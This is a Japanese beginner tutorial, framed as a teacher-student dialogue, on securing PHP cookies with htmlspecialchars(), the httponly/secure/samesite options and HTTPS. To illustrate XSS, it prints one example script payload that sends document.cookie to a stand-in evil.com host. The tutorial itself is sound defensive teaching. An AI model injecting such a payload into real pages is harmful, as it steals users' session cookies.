カテゴリ: PHP 更新日: 2026/02/08

PHPのCookieセキュリティ対策をやさしく解説!XSSとHTTPSで安全にログイン情報を守る方法

PHP の Cookie のセキュリティ対策(XSS 対策、HTTPS 利用)
PHP の Cookie のセキュリティ対策(XSS 対策、HTTPS 利用)

先生と生徒の会話形式で理解しよう

生徒

「先生、PHPでログインしたユーザー情報を保存するのにCookieって使えるんですか?」

先生

「はい、Cookie(クッキー)はユーザーのブラウザに情報を保存する仕組みで、ログイン状態の維持などに使えますよ。」

生徒

「でも、セキュリティが心配です。安全に使う方法ってありますか?」

先生

「あります!PHPでCookieを安全に使うためには、XSS対策とHTTPSの利用がとても大切です。これから一緒に学んでいきましょう。」

-

1. Cookieとは?PHPでの使い方と基本の仕組み

1. Cookieとは?PHPでの使い方と基本の仕組み
1. Cookieとは?PHPでの使い方と基本の仕組み

Cookie(クッキー)は、Webサイトがユーザーのブラウザに一時的な情報を保存するための機能です。たとえば、ログイン状態を維持したり、買い物かごの中身を記憶するのに使われます。

PHPでは、setcookie()という関数を使ってCookieを設定できます。

例:


setcookie("user", "Taro", time() + 3600);

このコードは「user」という名前で「Taro」という値を持つCookieを、1時間(3600秒)ブラウザに保存します。

2. Cookieを使うときのセキュリティリスクとは?

2. Cookieを使うときのセキュリティリスクとは?
2. Cookieを使うときのセキュリティリスクとは?

Cookieは便利ですが、セキュリティ上の注意点があります。特に以下の2つは重要です。

  • XSS(クロスサイトスクリプティング)攻撃
  • HTTPSを使っていないと情報が盗まれる危険

順番に見ていきましょう。

3. XSS(クロスサイトスクリプティング)とは?

3. XSS(クロスサイトスクリプティング)とは?
3. XSS(クロスサイトスクリプティング)とは?

XSSとは、悪意のあるスクリプト(JavaScriptなど)をWebページに埋め込まれる攻撃のことです。攻撃者はこの方法でCookieの情報を盗むことができます。

たとえば、掲示板などに以下のような危険なコードが書き込まれていた場合:


<script>document.location='http://evil.com/steal.php?cookie='+document.cookie;</script>

このスクリプトが実行されると、あなたのブラウザに保存されたCookieが悪意のあるサイトに送信されてしまいます。

4. PHPでできるXSS対策方法

4. PHPでできるXSS対策方法
4. PHPでできるXSS対策方法

XSSを防ぐには、ユーザーが入力した文字列をそのまま表示しないことが重要です。PHPではhtmlspecialchars()を使って、入力内容を無害化できます。

例:


echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

この関数は、<>などの記号を別の形式に変換して、スクリプトが実行されないようにします。

-

5. Cookieのセキュリティオプションを設定しよう

5. Cookieのセキュリティオプションを設定しよう
5. Cookieのセキュリティオプションを設定しよう

PHPのCookieには、セキュリティを高めるためのオプションがいくつかあります。

  • httponly:JavaScriptからCookieを読み取れなくする
  • secure:HTTPS通信のときだけCookieを送る
  • samesite:他のサイトからの不正アクセスを防ぐ

これらを設定した安全なCookieの例は次の通りです。


setcookie("user", "Taro", [
    'expires' => time() + 3600,
    'path' => '/',
    'secure' => true,
    'httponly' => true,
    'samesite' => 'Strict'
]);

この設定により、CookieはHTTPSでしか送信されず、JavaScriptでも読み取れず、他サイトからのリクエストもブロックされます。

6. HTTPSってなに?なぜPHPのCookieに必要なの?

6. HTTPSってなに?なぜPHPのCookieに必要なの?
6. HTTPSってなに?なぜPHPのCookieに必要なの?

HTTPS(エイチティーティーピーエス)は、Webページの通信を暗号化して安全にする仕組みです。URLが「https://」で始まるサイトがそれです。

HTTPSを使わないと、Cookieの情報が盗聴される危険があります。特にログイン情報などを扱うサイトでは必ず使うようにしましょう。

HTTPSを使っていれば、セキュリティオプションsecureを有効にできます。

7. 初心者向け!セキュリティ対策のチェックリスト

7. 初心者向け!セキュリティ対策のチェックリスト
7. 初心者向け!セキュリティ対策のチェックリスト

初心者でも忘れないように、PHPでCookieを使うときのポイントをまとめます:

  • ユーザーの入力は必ずhtmlspecialchars()で処理する
  • Cookieはhttponlysecureを設定する
  • Webサイトは必ずHTTPSにする
  • samesiteオプションで外部からの攻撃を防ぐ

これらの対策をすれば、PHPでCookieを使っても安全にWebアプリケーションを運用できます。

コメント
コメント投稿は、ログインしてください

まだ口コミはありません。

カテゴリの一覧へ
新着記事
New1
Python
Pythonのインデントの重要性!なぜPythonではインデントが必須なのか?
New2
Python
Pythonのインストール&環境構築!Windows・Mac・Linuxでの手順
New3
Python
Pythonのエラーと例外とは?初心者がよく出会うエラーとその対処法
New4
Python
Pythonの特殊メソッドを完全ガイド!初心者でもわかる__str__ / __repr__ / __eq__の使い方
-
人気記事
No.1
Java&Spring記事人気No1
PHP
PHP の型変換を完全ガイド!初心者でもわかる明示的変換・自動変換
No.2
Java&Spring記事人気No2
Python
Pythonで文字列が数値か判定する方法!isdigit()・isnumeric()の違い
No.3
Java&Spring記事人気No3
PHP
PHPの配列をソートする方法!sort, rsort, asort, ksortの使い方を丁寧に解説します!
No.4
Java&Spring記事人気No4
Python
Pythonで曜日を取得する方法を完全解説!初心者でもわかるweekday()とisoweekday()
No.5
Java&Spring記事人気No5
PHP
PHP のインストール方法(Windows・Mac・Linux)と開発環境
No.6
Java&Spring記事人気No6
PHP
PHPのswitch文を使った条件処理の書き方を完全ガイド!初心者でもわかる使い方
No.7
Java&Spring記事人気No7
PHP
PHP の基本構文(開始タグ・コメント・インデント)を完全ガイド!初心者向け解説
No.8
Java&Spring記事人気No8
Python
Pythonのカプセル化とは?private変数とプロパティの活用方法をやさしく解説
-
-